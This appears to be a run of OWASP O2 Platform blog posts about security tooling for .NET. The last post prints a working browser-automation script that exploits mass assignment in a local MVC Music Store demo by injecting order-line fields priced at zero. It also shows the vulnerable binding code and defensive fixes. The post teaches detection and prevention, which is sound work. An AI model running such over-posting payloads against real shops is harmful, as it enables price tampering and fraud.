OWASP O2 Platform Blog

How to use the Console output in the C# REPL

The VisualStudio C# REPL – O2 Platform can be downloaded here; the download is a Visual Studio Extension (a .vsix file).


Since this REPL is a great tool for developers, I wanted to use its Console output feature. The following code snippet shows how to achieve this functionality:

// Open a 500x300 popup window and add O2's ConsoleOut control to it;
// the control redirects Console.Out so that script output appears in the window
var topPanel = "Util - ConsoleOut".popupWindow(500,300);
topPanel.add_ConsoleOut();
// O2 directive: compile API_ConsoleOut.cs (which provides add_ConsoleOut) together with this script
//O2File:API_ConsoleOut.cs
Console.WriteLine("This text should be displayed in the Console");

This code produces the following output:


This is a powerful (and easy to use) feature that can save us a lot of time 🙂

November 9, 2012 | .NET, Uncategorized, VisualStudio

The latest version of OWASP O2 Platform is available: Your feedback is appreciated!

The latest version of the OWASP O2 Platform (version 4.3) is now available for download. In the screenshot below (taken from Dinis Cruz’s blog) you can see all the details:

O2 Platform latest version

In this image you can see that the download link is http://tiny.cc/O2Platform.

One of our ideals is to build a strong platform that helps people and organizations create secure applications, so we would like to hear from you. What do you think about it? Should we provide more documentation and examples about the usage of O2? Let us know; we will be happy to receive your feedback.

October 4, 2012 | Uncategorized

OWASP O2 Platform Presentation : A good starting point.

In case you didn’t know there is an OWASP O2 presentation, I would like to share the links to this very helpful material. The presentation is titled OWASP O2 Platform – Automating Security Knowledge through Unit Tests and was created by Dinis Cruz.
You can access these slides from two places:

  1. From Speaker Deck: https://speakerdeck.com/u/diniscruz/p/owasp-o2-platform-automating-security-knowledge-through-unit-tests
  2. From Dinis Cruz’s blog: http://diniscruz.blogspot.co.uk/p/owasp-o2-platform.html

I wanted to share this because I have seen positive comments from some of my colleagues in Costa Rica: after looking at the presentation, most of them saw the magic and power of the O2 Platform.

The image below shows the first slide:

Enjoy it!

August 9, 2012 | Uncategorized

FxCop Security rules: A nice-to-have feature on top of the O2 Platform

The community has already seen the effect of static analysis at run time, first described in a PoC that combined Microsoft’s static analysis tool CAT.NET with the OWASP O2 Platform on top of Visual Studio .NET, and we strongly believe in the value added by using the O2 Platform as part of our development work.

Along the same lines, a really nice-to-have feature would be an integration with FxCop. FxCop analyzes managed code assemblies and reports findings in several areas, including COM, Design, Globalization, Naming, Performance, Security and Usage.

The latest version of FxCop is included as part of the Microsoft Windows SDK for Windows 7 and .NET Framework 4.

Here are some useful links with more information about this tool:

  1. For downloading it:
    http://blogs.msdn.com/b/codeanalysis/archive/2010/07/26/fxcop-10-0-is-available.aspx
  2. The ISO files can also be downloaded from the link below:
    http://www.microsoft.com/en-us/download/details.aspx?id=8442
  3. FxCop ASP.NET Security Rules: a really interesting project hosted at CodePlex that offers a set of rules for ASP.NET applications:
    http://fxcopaspnetsecurity.codeplex.com/

It would be great to have those security rules available in the O2 Platform, and why not via real-time analysis :).

FxCop ASP.NET Security rules

July 19, 2012 | .NET, Tools

NuGet packages for OWASP O2 Platform

NuGet is a really interesting mechanism for installing packages into your Visual Studio project in a straightforward way. Dinis Cruz has made the first components of the O2 Platform available as a NuGet package.

NuGet is a new paradigm for installing useful tools that avoids the usual pain of XML configuration. It’s really interesting to have the OWASP O2 functionality available this way, and I bet this will become the preferred way to make it available in future releases and to publish features on top of Visual Studio .NET.

The image below shows the package manager:

Managing NuGet packages

Now we are going to look for our OWASP O2 packages:

OWASP O2 at NuGet

This mechanism is a really good option for simplifying our lives :).

July 4, 2012 | .NET

Real-time Vulnerability Creation Feedback inside VisualStudio

There is a really interesting video that shows how to perform static analysis of code at compilation time inside Visual Studio .NET. This mechanism is really powerful because, at compilation time, you can find and correct most of the security holes we create. Just imagine the value this process can add to a large software development project.

The complete information can be found at http://diniscruz.blogspot.com/2012/06/real-time-vulnerability-creation.html?utm_source=feedburner&utm_medium=email&utm_campaign=Feed%3A+DinisCruz+%28Dinis+Cruz+blog%29

There is also a reddit thread if you want to get involved (I hope you do).

June 22, 2012 | .NET, .NET SAST, VisualStudio

New reddit community for OWASP O2 and Cat.Net

A new community has been created on Reddit to support Cat.Net, the static analysis engine created by Microsoft (which has lacked support over the last year). We see an opportunity here to involve the OWASP O2 Platform and add value to our project along this new path of source code analysis.

Join this community today!

Reddit community

For more information visit http://diniscruz.blogspot.com/2012/06/new-reddit-community-for-catnet.html

June 13, 2012 | .NET SAST, O2 Scripting

Installing O2’s Visual Studio Add-in, Script environment in Visual Studio IDE

Here is a video on how to install the OWASP O2 add-in on top of Visual Studio; the video can be found at:

http://diniscruz.blogspot.co.uk/2012/05/video-installing-o2s-visualstudio-2010.html

By the way, the Visual Studio add-in is located in your local copy of the OWASP O2 Platform: in the O2.Platform.Projects folder there should be a Visual Studio project named O2.VisualStudio.AddIn. The .AddIn file can be found in the binaries folder.

Visual Studio Addin

Once you have installed the add-in, you will be able to use this powerful tool from within the Visual Studio IDE.

May 25, 2012 | .NET, Uncategorized, VisualStudio

Setting useLegacyV2RuntimeActivationPolicy on O2

I just set the useLegacyV2RuntimeActivationPolicy flag in O2’s O2 Platform.exe.config file (app.config) so that it is possible to load the CefSharp dlls (which are managed C++ assemblies built against .NET 2.0) and run Chrome inside O2.

I’m not entirely sure what the long-term effects of this are, but so far so good.

Here are some references:

Rant: Come on WordPress.com, sort your site out, it took me 20 minutes to post this! (See Losing my mojo with WordPress.com (they’re not getting the basics right).) Originally I was not able to add hyperlinks to this post’s text since WordPress’s link button in the editor was not working (another ‘back to basics’ example).

May 25, 2012 | O2 Internals

Exploiting Microsoft MVC vulnerabilities using OWASP O2 Platform

In this post, I’m going to show the value of using the OWASP O2 Platform to exploit (and therefore detect, correct and prevent) vulnerabilities in applications built on the Microsoft MVC platform.

Background

Over the last few years the industry has broadly adopted the MVC architecture for building web applications, for several reasons, including the rapid and efficient paradigm it offers for building really good applications.

A few weeks ago, a user exploited a vulnerability at GitHub. The vulnerability exploited in that case is an old issue in the MVC architecture of several frameworks, including Rails. It is usually called mass assignment, but it is also known as over-posting or autobinding. Dinis Cruz wrote an interesting post about this vulnerability in the Spring MVC framework: http://diniscruz.blogspot.com/2012/04/we-need-security-focused-saststatic.html.

Along the same lines, Dinis wrote a really nice O2 script that exploits this vulnerability on top of Microsoft MVC. To illustrate this use case of the OWASP O2 Platform, Dinis used a demo MVC application named MVC Music Store, hosted at CodePlex (a great application that shows how this architecture is used).

Once you have this application up and running, you should see something like this:

ASP.NET MVC MUSIC STORE

O2 Script to exploit the vulnerability

Dinis wrote the script below to exploit this vulnerability. Basically it is an IE automation script, powerful enough to over-post some form fields and update them. Let’s look at the script and then at a quick explanation of it.

// "ie_Fyila" is a random cache key: it keeps this IE control instance unique when
// several instances of the control exist at the same time
var ie = "ie_Fyila".o2Cache(()=> panel.clear().add_IE()).silent(true);

var site = "http://localhost:26641";   // local MVC Music Store instance

// Registers a new account through the normal registration form
Action<string,string,string> register =
    (username, password, email)=>{
        ie.open(site + "/Account/Register");
        ie.field("UserName").value(username);
        ie.field("Email").value(email);
        ie.field("Password").value(password);
        ie.field("ConfirmPassword").value(password);
        ie.button("Register").click();
    };

// Registering also logs the new user in
Action loginAsTestUser =
    ()=>{
        var user1_name  = "test_user".add_RandomLetters(5);
        var user1_email = "test@testuser.com";
        var user1_pwd   = "a pwd".add_RandomLetters(10);
        register(user1_name, user1_pwd, user1_email);
    };

Action selectTestProductAndCheckout =
    ()=>{
        ie.link("Rock").scrollIntoView().flash().click();
        // Selects the Led Zeppelin I album
        ie.link(" Led Zeppelin I ").scrollIntoView().flash().click();
        ie.link("Add to cart").flash().click();
        ie.link("Checkout >>").flash().click();
    };

// Fills in the legitimate checkout form fields
Action populateSubmitOrder =
    ()=>{
        var Address    = "Foo Address";
        var City       = "Foo City";
        var Country    = "Foo Country";
        var Email      = "Email@email.com";
        var FirstName  = "Foo FirstName";
        var LastName   = "Foo LastName";
        var Phone      = "Foo Phone";
        var PostalCode = "AAA BBB";
        var State      = "Foo State";
        var PromoCode  = "FREE"; // currently hard coded promotional code

        ie.field("Address").value(Address);
        ie.field("City").value(City);
        ie.field("Country").value(Country);
        ie.field("Email").value(Email);
        ie.field("FirstName").value(FirstName);
        ie.field("LastName").value(LastName);
        ie.field("Phone").value(Phone);
        ie.field("PostalCode").value(PostalCode);
        ie.field("PromoCode").value(PromoCode);
        ie.field("State").value(State);
    };

Action submitOrder =
    ()=>{
        ie.button("Submit Order").click();
    };

// Normal (non-malicious) checkout flow, kept for comparison
Action createOrderUsingTestUser =
    ()=>{
        loginAsTestUser();
        selectTestProductAndCheckout();
        populateSubmitOrder();
        submitOrder();
    };

// Adds an extra <input> to the checkout form (right after the FirstName field),
// so the browser sends it as one more field of the POST request
Action<string,string> injectField =
    (fieldName, value)=>{
        ie.field("FirstName")
          .injectHtml_afterEnd("{0}:<input type=\"text\" name=\"{0}\" value=\"{1}\" />".format(fieldName, value));
    };

Action runExploit_1 =
    ()=>{
        loginAsTestUser();
        selectTestProductAndCheckout();
        populateSubmitOrder();

        // The following simulates adding this to the POST request, following the URI convention:
        // OrderDetails[0].OrderDetailId=1&OrderDetails[0].OrderId=1&OrderDetails[0].AlbumId=1&OrderDetails[0].Quantity=1&OrderDetails[0].UnitPrice=5&
        injectField("OrderDetails[0].OrderDetailId","1");
        injectField("OrderDetails[0].OrderId","1");
        injectField("OrderDetails[0].AlbumId","1");
        injectField("OrderDetails[0].Quantity","1");
        injectField("OrderDetails[0].UnitPrice","0");
        submitOrder();
        ie.open(site + "/OrderDetails");
    };

runExploit_1();

return "done";

//O2File:WatiN_IE_ExtensionMethods.cs
//O2Ref:WatiN.Core.1x.dll
//O2Tag_DontAddExtraO2Files;

If you look at this script, you will notice that its purpose is to register a user, select an album and submit the order. But notice that the script also injects extra fields (related to another album): we are buying one album, but we are also submitting a second one by injecting it as part of the HTML form fields, and guess what? It is for free :).

These are the HTTP POST form fields that were sent to the server:

HTTP form post fields using Fiddler

And this is what our order details look like:

Order details

How was this possible?

If you look at the Orders model, you will notice that it has several properties, the last one being a list of OrderDetails. If you look carefully, you will see that this property is not protected against modification from the request (for example with a ReadOnly or Bind attribute), which is what makes it possible to send extra fields as part of the request.

// Some properties of the Order model (class name as in the MVC Music Store sample;
// properties not shown in the post are omitted)
public class Order
{
    [Required(ErrorMessage = "Email Address is required")]
    [DisplayName("Email Address")]
    [RegularExpression(@"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}", ErrorMessage = "Email is not valid.")]
    [DataType(DataType.EmailAddress)]
    public string Email { get; set; }

    [ScaffoldColumn(false)]
    public decimal Total { get; set; }

    // No binding restriction here: the default model binder populates this list
    // from any OrderDetails[n].* fields present in the POST
    public List<OrderDetail> OrderDetails { get; set; }
}

The Checkout controller accepts a FormCollection parameter that holds all the HTTP POST form fields; in the image below you can see that it contains the data for the second order line.

Checkout controller

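To show the defensive side of what the script above demonstrates, here is an added example (my own code, not the post’s script and not the MVC Music Store sample) of the binding pattern that makes over-posting possible, next to two ways of closing it. Only the Order/OrderDetail property names follow the page; the controller, view-model and helper names are assumptions.

```csharp
// Added example: over-posting (mass assignment) in ASP.NET MVC and two fixes.
// Not code from the post or from the MVC Music Store sample; names other than the
// Order/OrderDetail properties shown on the page are assumptions.
using System.Collections.Generic;
using System.Linq;
using System.Web.Mvc;

namespace OverPostingDemo
{
    public class OrderDetail
    {
        public int OrderDetailId { get; set; }
        public int OrderId { get; set; }
        public int AlbumId { get; set; }
        public int Quantity { get; set; }
        public decimal UnitPrice { get; set; }
    }

    public class Order
    {
        public int OrderId { get; set; }
        public string FirstName { get; set; }
        public string LastName { get; set; }
        public string Address { get; set; }
        public string Email { get; set; }
        public decimal Total { get; set; }
        // Every public settable property is reachable by the default model binder,
        // so a posted "OrderDetails[0].UnitPrice=0" lands in this collection.
        public List<OrderDetail> OrderDetails { get; set; }
    }

    // VULNERABLE: the entity is bound straight from the request, so attacker-supplied
    // OrderDetails[*] fields become order lines (the pattern the post exploits).
    public class CheckoutVulnerableController : Controller
    {
        [HttpPost]
        public ActionResult AddressAndPayment(FormCollection values)
        {
            var order = new Order();
            TryUpdateModel(order, values.ToValueProvider());
            // ... order is saved with whatever lines the request supplied ...
            return RedirectToAction("Complete", new { id = order.OrderId });
        }
    }

    // FIX 1: bind a view model that only has the fields the checkout form really contains,
    // and build the order lines from the server-side cart, never from the request.
    public class CheckoutAddressViewModel
    {
        public string FirstName { get; set; }
        public string LastName { get; set; }
        public string Address { get; set; }
        public string Email { get; set; }
        public string PromoCode { get; set; }
    }

    public class CheckoutHardenedController : Controller
    {
        // Keys this action legitimately expects (the anti-forgery token is added by MVC's form helper).
        private static readonly HashSet<string> ExpectedFields = new HashSet<string>
            { "FirstName", "LastName", "Address", "Email", "PromoCode", "__RequestVerificationToken" };

        [HttpPost]
        public ActionResult AddressAndPayment(CheckoutAddressViewModel form)
        {
            // Detection hook: any key outside the whitelist (e.g. "OrderDetails[0].UnitPrice")
            // is an over-posting attempt worth logging; reject the request.
            var unexpected = UnexpectedFields(Request.Form.AllKeys, ExpectedFields);
            if (unexpected.Count > 0)
                return new HttpStatusCodeResult(400, "Unexpected form fields");

            var order = new Order
            {
                FirstName = form.FirstName, LastName = form.LastName,
                Address = form.Address, Email = form.Email,
                OrderDetails = LinesFromServerSideCart()   // assumed helper, see below
            };
            order.Total = order.OrderDetails.Sum(d => d.Quantity * d.UnitPrice);
            // ... save order ...
            return RedirectToAction("Complete", new { id = order.OrderId });
        }

        // FIX 2: when the entity itself must be bound, whitelist the bindable properties.
        // OrderDetails is absent from Include, so injected OrderDetails[*] fields are ignored.
        [HttpPost]
        public ActionResult AddressAndPaymentWithBind(
            [Bind(Include = "FirstName,LastName,Address,Email")] Order order)
        {
            order.OrderDetails = LinesFromServerSideCart();
            return RedirectToAction("Complete", new { id = order.OrderId });
        }

        // Returns the posted keys that are not in the expected set.
        public static List<string> UnexpectedFields(IEnumerable<string> postedKeys, ISet<string> expected)
        {
            return postedKeys.Where(k => !expected.Contains(k)).ToList();
        }

        private List<OrderDetail> LinesFromServerSideCart()
        {
            // Assumed: a real application reads the cart persisted for the current user here.
            return new List<OrderDetail>();
        }
    }
}
```

Fix 1 is the one to prefer: a view model cannot carry an OrderDetails property, so there is nothing for the binder to over-post into, and the unexpected-key check turns an attempt into a logged 400 instead of a free album. Fix 2 keeps the entity as the action parameter but relies on the Include list staying in sync with the model, which is easy to forget when a property is added later.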
Final thoughts

This script is one of many examples of the advantages of using O2 scripts: we were able to exploit a vulnerability on top of Microsoft MVC. The script is simple and easy to read, and yet powerful enough to identify this kind of problem. The IE automation support in the OWASP O2 Platform represents a new paradigm in automation, and its power allows us to make web application security visible.

As you can see, it is easy to fall into this vulnerability. You could argue that this kind of issue can be solved with good design and best practices, and you would probably be right, but we are still vulnerable whenever somebody forgets the mechanisms for writing secure code, especially when working with this kind of architecture.

I would like to thank Dinis Cruz for making this script available and for all his work on the O2 Platform project.

May 20, 2012 | .NET, ASP.NET MVC, Fixing Code, IE Automation, Vulnerabilities, WatiN